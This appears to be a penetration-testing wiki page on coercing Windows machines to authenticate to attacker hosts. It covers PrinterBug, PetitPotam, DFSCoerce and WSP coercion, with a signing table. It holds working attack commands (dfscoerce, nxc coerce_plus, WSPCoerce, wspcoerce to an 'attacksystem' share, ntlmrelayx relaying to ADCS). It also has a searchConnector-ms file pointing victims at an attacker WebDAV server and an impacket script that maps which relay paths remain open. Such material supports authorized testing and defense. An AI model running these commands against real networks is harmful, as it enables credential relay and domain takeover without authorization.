Internal - Coerce
Coercion refers to forcing a target machine (usually as SYSTEM, i.e. with its computer account) to authenticate to another machine, typically one the attacker controls so that the authentication can be captured or relayed.
Signing
Server Side Signing
| Operating System | SMB Signing required by default | LDAP Signing required by default |
|---|---|---|
| Windows Server 2019 DC | ✅ | ❌ |
| Windows Server 2022 DC pre 23H2 | ✅ | ❌ |
| Windows Server 2022 DC 23H2 | ✅ | ✅ |
| Windows Server 2025 DC | ✅ | ✅ |
| Windows Server 2019 Member | ❌ | - |
| Windows Server 2022 Member | ❌ | - |
| Windows Server 2025 Member | ❌ | - |
| Windows 10 | ❌ | - |
| Windows 11 23H2 | ❌ | - |
| Windows 11 24H2 | ✅ | - |
- Server-side SMB signing is now required by default on domain controllers, so a coerced authentication cannot be relayed to a DC over SMB.
- Server-side SMB signing is still not required by default on non-DC Windows servers, which therefore remain viable SMB relay targets.
WebClient Service
- On Windows workstations, the WebClient service is installed by default (trigger-started, so it is usually stopped until something starts it).
- On Windows servers, it is not installed by default.
- The service matters because coercing a target into a WebDAV (HTTP) connection yields an NTLM authentication that carries no SMB signing requirement and can be relayed to LDAP/LDAPS or HTTP endpoints.
Enable WebClient:
The WebClient service can be started on the machine using several techniques:
- Mapping a WebDAV server using the `net` command: `net use ...`
- Typing anything into the Explorer address bar that isn't a local file or directory
- Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside. Such a file pointing at the attacker's WebDAV server:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
  <description>Microsoft Outlook</description>
  <isSearchOnlyItem>false</isSearchOnlyItem>
  <includeInStartMenuScope>true</includeInStartMenuScope>
  <templateInfo>
    <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
  </templateInfo>
  <simpleLocation>
    <url>http://attacksystem/path</url>
  </simpleLocation>
</searchConnectorDescription>
```
Check if the WebClient (WebDAV) service is running
MS-RPRN - PrinterBug
Tools:
- leechristensen/SpoolSample - PoC tool to coerce Windows hosts to authenticate to other machines via the MS-RPRN RPC interface.
Examples:
Checking if the Spooler Service is running.
MS-EFSR - PetitPotam
The tools use the LSARPC named pipe with interface c681d488-d850-11d0-8c52-00c04fd90f7e because it is the more widely reachable of the two, but MS-EFSR can also be triggered through the EFSRPC named pipe with interface df1941c5-fe89-4e79-bf10-463657acf44d.
Tools:
- topotam/PetitPotam - PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.
Examples:
MS-DFSNM - DFS Coercion
DFS Coerce (MS-DFSNM abuse) is a technique to force a Windows system to authenticate to an attacker-controlled machine by abusing the DFS Namespace Management RPC interface, exposed over the netdfs named pipe; it is reachable on domain controllers, which run the DFS Namespace service.
Tools:
- Wh04m1001/DFSCoerce - PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.
Examples:
python3 dfscoerce.py -u username -d domain.local 10.10.10.10 10.10.10.11
poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=DFSCoerce
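The page leaves the actual checks implicit: the Signing table above, "Check if the WebClient (WebDAV) service is running", "Checking if the Spooler Service is running", and the MS-EFSR pipe discussion. The script below is an added example, not code from this page or from any of the listed tools. It uses impacket to connect to a victim and to a relay target, reports whether the target requires SMB signing, binds the MS-RPRN, MS-EFSR (both pipes) and MS-DFSNM interfaces to see which coercion triggers are exposed, opens the "DAV RPC SERVICE" named pipe to detect a running WebClient, and then turns the results into the relay paths that are still possible. The host names, credentials and the MS-DFSNM interface UUID (4fc742e0-4a10-11cf-8273-00aa004ae673, v3.0, which the page does not quote) are assumptions of this example.

```python
#!/usr/bin/env python3
"""Probe hosts for the coercion surface covered on this page and decide
which relay paths they support. Added example (not from the page or from the
listed tools); assumes impacket is installed and valid domain credentials.
All host names are placeholders."""
from __future__ import annotations

import argparse
from dataclasses import dataclass, field

# MS-EFSR UUIDs are the two quoted on this page; MS-DFSNM (netdfs, v3.0) is an
# assumption of this example. MS-RPRN's UUID is taken from impacket.
MS_EFSR_LSARPC = ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0")
MS_EFSR_EFSRPC = ("df1941c5-fe89-4e79-bf10-463657acf44d", "1.0")
MS_DFSNM = ("4fc742e0-4a10-11cf-8273-00aa004ae673", "3.0")


@dataclass
class Surface:
    host: str
    smb_signing_required: bool
    triggers: list[str] = field(default_factory=list)  # reachable coercion interfaces
    webclient: bool = False  # "DAV RPC SERVICE" pipe present => WebClient running


def relay_paths(victim: Surface, target: Surface) -> list[str]:
    """Decide where a coerced authentication from `victim` can be relayed.
    Pure function (no network) so the rules can be checked offline."""
    if not victim.triggers:
        return []  # nothing to coerce with
    paths = []
    # SMB -> SMB works only when the relay target does not require signing.
    if not target.smb_signing_required:
        paths.append(f"SMB -> SMB on {target.host} (signing not required)")
    # HTTP targets (e.g. ADCS web enrollment) never require signing, so any
    # trigger can be relayed there.
    paths.append(f"SMB -> HTTP on {target.host} (e.g. ADCS web enrollment)")
    # LDAP/LDAPS honours the signing flag the SMB client sets in NTLM; the
    # WebDAV client does not set it, so LDAP needs a WebClient-sourced auth.
    if victim.webclient:
        paths.append(f"HTTP(WebDAV) -> LDAP/LDAPS on {target.host} "
                     f"(WebClient running on {victim.host})")
    return paths


def probe(host: str, user: str, password: str, domain: str) -> Surface:
    """Fill a Surface over the network. impacket is imported here, lazily, so
    relay_paths() stays importable and testable without it."""
    from impacket.dcerpc.v5 import rprn, transport
    from impacket.smb3structs import FILE_READ_DATA
    from impacket.smbconnection import SMBConnection
    from impacket.uuid import uuidtup_to_bin

    smb = SMBConnection(host, host)
    smb.login(user, password, domain)
    surface = Surface(host, smb.isSigningRequired())

    def binds(pipe: str, iface: bytes) -> bool:
        # A successful bind proves the interface is exposed on that pipe; a
        # rejected bind (e.g. Spooler stopped) rules that trigger out.
        # Pipe handles are left open on purpose; logoff() releases them.
        try:
            rpc = transport.DCERPCTransportFactory(rf"ncacn_np:{host}[\pipe\{pipe}]")
            rpc.set_smb_connection(smb)
            dce = rpc.get_dce_rpc()
            dce.connect()
            dce.bind(iface)
            return True
        except Exception:
            return False

    checks = [
        ("PrinterBug (MS-RPRN over \\pipe\\spoolss)", "spoolss", rprn.MSRPC_UUID_RPRN),
        ("PetitPotam (MS-EFSR over \\pipe\\lsarpc)", "lsarpc", uuidtup_to_bin(MS_EFSR_LSARPC)),
        ("PetitPotam (MS-EFSR over \\pipe\\efsrpc)", "efsrpc", uuidtup_to_bin(MS_EFSR_EFSRPC)),
        ("DFSCoerce (MS-DFSNM over \\pipe\\netdfs)", "netdfs", uuidtup_to_bin(MS_DFSNM)),
    ]
    surface.triggers = [name for name, pipe, iface in checks if binds(pipe, iface)]

    # WebClient exposes the "DAV RPC SERVICE" pipe on IPC$ only while running.
    try:
        tid = smb.connectTree("IPC$")
        fid = smb.openFile(tid, "DAV RPC SERVICE", desiredAccess=FILE_READ_DATA)
        smb.closeFile(tid, fid)
        surface.webclient = True
    except Exception:
        surface.webclient = False
    smb.logoff()
    return surface


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Coercion surface probe")
    ap.add_argument("victim", help="host to coerce")
    ap.add_argument("target", help="host the coerced authentication would be relayed to")
    ap.add_argument("-u", "--user", required=True)
    ap.add_argument("-p", "--password", required=True)
    ap.add_argument("-d", "--domain", required=True)
    args = ap.parse_args()
    v = probe(args.victim, args.user, args.password, args.domain)
    t = probe(args.target, args.user, args.password, args.domain)
    print(f"{v.host}: smb_signing_required={v.smb_signing_required} webclient={v.webclient}")
    for trig in v.triggers:
        print("  trigger:", trig)
    for path in relay_paths(v, t) or ["no usable relay path"]:
        print("  path:", path)
```

Run it as `python3 coerce_surface.py ws01.lab.local dc01.lab.local -u user -p 'pass' -d lab.local` (placeholder names). It only probes SMB signing; LDAP signing and channel binding on the relay target are not checked, so the LDAP path it reports still has to be confirmed against the LDAP column of the table above.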
MS-WSP - WSP Coercion
- The `wsearch` service is only enabled by default on workstations, and has been disabled on servers since Server 2016.
- Only SMB connections can be coerced with WSP.
Tools:
- slemire/WSPCoerce - PoC to coerce authentication from Windows hosts using MS-WSP.
- RedTeamPentesting/wspcoerce - wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP.
Examples:
WSPCoerce.exe <target> <listener>
WSPCoerce.exe labsw1 172.23.10.109
WSPCoerce.exe labsw1 labsrv1
wspcoerce 'lab.redteam/rtpttest:test1234!@192.0.2.115' "file:////attacksystem/share"
ntlmrelayx.py -t "http://192.0.2.5/certsrv/" -debug -6 -smb2support --adcs
- The target must be given as a short hostname; neither an IP address nor an FQDN works.
- Use a hostname or FQDN (not an IP address) for the listener if you want to receive Kerberos authentication.